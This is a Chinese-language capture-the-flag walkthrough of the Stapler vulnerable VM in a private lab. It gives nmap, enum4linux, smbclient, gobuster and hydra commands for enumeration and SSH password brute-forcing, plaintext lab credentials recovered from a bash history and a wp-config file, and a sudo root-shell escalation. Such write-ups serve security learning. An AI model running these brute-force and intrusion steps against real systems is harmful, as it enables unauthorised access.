前言

靶机：stapler靶机，IP地址为192.168.10.12

攻击：kali，IP地址为192.168.10.6

靶机采用virtualbox，攻击机采用VMware虚拟机，都采用桥接网卡模式

文章涉及的靶机及工具，都可以自行访问官网或者项目地址进行获取，或者通过网盘链接下载 https://pan.quark.cn/s/ee513814fee2

主机发现

也就是相当于现实环境中去发现确定主机的ip地址，因为这里是靶机环境，所以跳过了从域名到ip地址的过程。

使用arp-scan -l或者netdiscovery -r 192.168.10.1/24

当然也可以使用nmap等工具进行

netdiscover -r 192.168.10.1/24

信息收集

使用nmap扫描目标端口等信息

首先扫描目标的tcp端口的开放情况

nmap -sT --min-rate=1000 192.168.10.12 -p- -oA nmap-tcp

再扫描udp端口的开放情况

nmap -sU --min-rate=1000 192.168.10.12 --top-ports 20 -oA nmap-udp

可以看到明确开放的udp端口没有，所以下面对tcp端口进行一个筛选

ports=`grep open nmap-tcp.nmap | awk -F'/' '{print $1}' | paste -sd ','`

进一步对这些端口进行服务、系统等探测

nmap -sV -O -sC 192.168.10.12 -p $ports --min-rate=1000 -oA detail

再使用nmap的漏洞检测脚本对这些端口进行探测

nmap --script=vuln 192.168.10.12 -p $ports -oA vuln

信息小结：

FTP信息探测

使用anonymous匿名空密码登录

ftp [email protected]ls -laget note

查看note，又有发现

信息小结，获取三个用户名

harryellyjohn

SMB探测

使用enum4linux探测服务

enum4linux 192.168.10.12 -a

可以看到有几个共享

以及一堆用户名

或者使用nmap的脚本进行探测

nmap --script=smb* 192.168.10.12

共享出的一样，只是这里明确列举出了共享中的文件

使用smbclient查看或者连接也行

smbclient -L //192.168.10.12

使用smbclient连接kathy共享

smbclient //192.168.10.12/kathy -Nsmb: > prompt        #关闭交互smb: > recurse        #开启递归smb: > mget *        #下载所有

再连接tmp共享，下载所有文件

smbclient //192.168.10.12/tmp -Nsmb: > prompt        #关闭交互smb: > recurse        #开启递归smb: > mget *        #下载所有

查看文件构造，发现一个压缩包，一个txt文件

查看相关文件，发现一个用户名kathy，以及wordpress的备份文件

#解压文件tar -zxf wordpress-4.tar.gz

不过查看了很久，并没有发现连接数据库的配置文件

查看ls文件，发现只是一种记录

信息小结：

获取众多用户名，把前面获取的用户名都放在一起，做成字典

peterRNunemakerETollefsonDSwangerAParnellSHayslettMBassinJBareLSolumIChadwickMFreiSStroudCCeaserJKanodeCJooEethLSolum2JLippsjamieSamDrewjessSHAYTaylormelkaizoeNATHANwwwellykathyharryjohn

网站信息探测

访问80端口的网站

并没有发现东西，并且页面源代码也没有内容

使用gobuster等工具进行目录爆破

gobuster dir -u http://192.168.10.12 -w /usr/share/wordlists/dirb/big.txt -b 404 -x php,html,txt,md       

访问这两个发现直接下载，并且这两个文件，一般是在某个用户的主目录下的，猜测这个网站，可能就是以某个用户的主目录为网站目录的

在测试.ssh/id_rsa无果后，暂且搁置该网站

访问12380网站

可以看到，主界面没有任何内容，并且页面源代码中也没有内容

使用dirb进行网站扫描，没有出现任何内容

dirb http://192.168.10.12:12380

密码爆破

目前只有大量的用户名，并没有其他东西，以之前整理后的user，进行密码爆破

hydra -L username -P /usr/share/wordlists/fasttrack.txt 192.168.10.12 ssh

爆破出三个，随便以这用户进行登录，发现基本上没有什么内容，并且用户众多

一个个访问这些目录，只有在JKanode用户的目录下，发现命令历史记录中具有信息

sshpass -p thisimypassword ssh JKanode@localhostsshpass -p JZQuyIN5 peter@localhost

经测试，上面这两个可以作为ssh登录，这里开始整理信息

这里查看网站，发现在/var/www/https/blogblog/wp-config.php的配置文件，有连接数据库的配置

发现密码plbkac，并且连接数据库的是以root执行的

查看wordpress数据库，发现其中的一些用户，不过都是加密处理的，不知道其算法

提权

这里可能存在mysql udf提权，但是这里测试发现，不想，因为mysql版本大于5.0，并且插件的所在路径对于非root用户没有写入权限，所以无法提权

从前面所有用户下手，并且使用find寻找具有SUID权限的文件

不过最终只有在peter用户不一样，登录界面就不同

以peter使用sudo -l发现完全ok

直接sudo /bin/bash -p提权

查看最终flag

总结

该靶机主要就是枚举，枚举，枚举！！！！

1. 1. FTP服务的匿名探测
2. 2. SMB服务的用户名枚举
3. 3. SSH服务的暴力破解
4. 4. 靶机内信息收集，找到的密码
5. 5. 最终提权，就是不同用户直接的切换